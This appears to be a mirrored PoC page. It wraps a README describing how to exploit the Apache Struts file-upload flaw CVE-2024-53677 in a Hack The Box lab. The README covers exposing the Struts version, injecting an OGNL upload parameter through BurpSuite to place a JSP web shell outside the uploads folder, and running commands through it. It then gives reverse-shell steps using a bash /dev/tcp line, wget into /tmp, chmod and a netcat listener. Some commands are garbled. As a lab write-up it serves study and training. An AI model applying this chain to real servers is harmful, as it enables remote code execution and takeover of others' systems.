关联漏洞
标题:
Apache Struts 安全漏洞
(CVE-2024-53677)
描述:Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2.0.0版本至6.4.0之前版本存在安全漏洞,该漏洞源于文件上传逻辑缺陷。
描述
Apache Struts CVE-2024-53677 Exploitation
介绍
# CVE-2024-53677 Exploitation
### Apache Struts RCE via File Upload
## Description
CVE-2024-53677 is a vulnerability which impacts Apache Struts from 2.0.0 before 6.4.0. **⚠️ This was exploited in a Hack The Box lab.**
File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.
🔗 **Reference:** [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2024-53677)
## Reconnaissance
### **Identifying an Attack Vector**
<img alt="image" src="https://github.com/user-attachments/assets/06a746b4-e8bd-4af5-b045-19da69f5715d" style="width:500px; height:250px; object-fit:cover;"/>
1. The website has an **image upload** feature.
2. Uploaded files are stored at: ip/uploads/20250213_014317/starwars.png
3. On successful upload the sharable link of the image has the URL ip/s/04ab2f40
4. Finding the Apache Struts Version
- An exposed `pom.xml` revealed **Apache Struts 6.3.0.1**
- Confirmed vulnerable to **CVE-2024-53677**
📸 **pom.xml exposure:**
<img alt="image" src="https://github.com/user-attachments/assets/ee0db346-b7ba-4e61-aa3d-4abe833323f8" style="width:500px; height:250px; object-fit:cover;"/>
## Exploitation
### **Modifying File Upload Request**
To exploit this vulnerability we utalise **BurpSuite** and its **Repeater** functionality to modify the packets before sending it. Below we have an unedited request.
<p>
<img alt="image" src="https://github.com/user-attachments/assets/8bc1f4ab-9020-4da8-ba85-ea00c42075d9" style="width:500px; height:250px; object-fit:cover;"/>
</p>
Our issues are the site **blocks** file types which are not **[JPG, JPEG, PNG, GIF]** and anything in the /uploads directory is **Not Executable**. To get around these issues we will first add another paramenter.
<p>
<img alt="test" src="https://github.com/user-attachments/assets/98b4c912-e7dd-4581-93a3-b9df9e70bce7" style="width:500px; height:250px; object-fit:cover;"/>
</p>
The added parameter exploits OGNL (Object-Graph Navigation Language), which Apache Struts uses to process input data. The FileUploadInterceptor processes this parameter before handling the actual PNG image, allowing attackers to manipulate the request and potentially execute arbitrary code.
### **Finalising the Exploit**
After adding the modified parameter, the server response confirms that the file was successfully uploaded. However, we notice that the file path differs from the usual upload directory.
<p>
<img alt="plshelp" src="https://github.com/user-attachments/assets/88d2ddf5-9f86-4386-ae52-ac01e7aa19c4" style="width:500px; height:250px; object-fit:cover;"/>
</p>
#### **Attaching the Payload**
Next, we embed the payload by appending it directly below the image data and right before our injected parameters. The shell payload can be sourced 🔗 **Reference:** [shell.jsp](https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsp)
Additionally, one crucial detail is that the request requires "Upload" with a capital U instead of lowercase upload. This follows the exploit structure observed in: 🔗 **Reference:** [exploit.py](https://github.com/EQSTLab/CVE-2024-53677/blob/main/CVE-2024-53677.py)
With these modifications in place, we send the request. The server responds similarly, confirming a successful upload and reflecting the adjusted file path.
#### **Navigating the Exploit**
Now, by navigating to the following URL, we can interact with our uploaded shell.
<pre> ip/shelll.jsp?action=cmd&cmd=id </pre>
<img alt="final shell" src="https://github.com/user-attachments/assets/9170b1d3-2025-40d5-b3d8-e602aba7a196" style="width:500px; height:250px; object-fit:cover;"/>
At this stage, we can establish a reverse shell using a locally hosted web server. A simple way to achieve this is with Python:
python3 http.server -m 3004
Next, create a basic shell script (e.g., shell.sh)
cat bash -i >& /dev/tcp/$IP/$PORT 0>&1 > shell.sh
Use wget to download it
wget http://ip_address/filename -O /tmp
After downloading, provide execution permissions
chmod +777 /tmp/filename
and then use nc (netcat) to listen for the reverse shell.
nc -lvnp $PORT
Finally execute
./filename </pre>
文件快照
[4.0K] /data/pocs/c559a033265eb06c8beca2dbb9974808de8c638e
└── [4.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。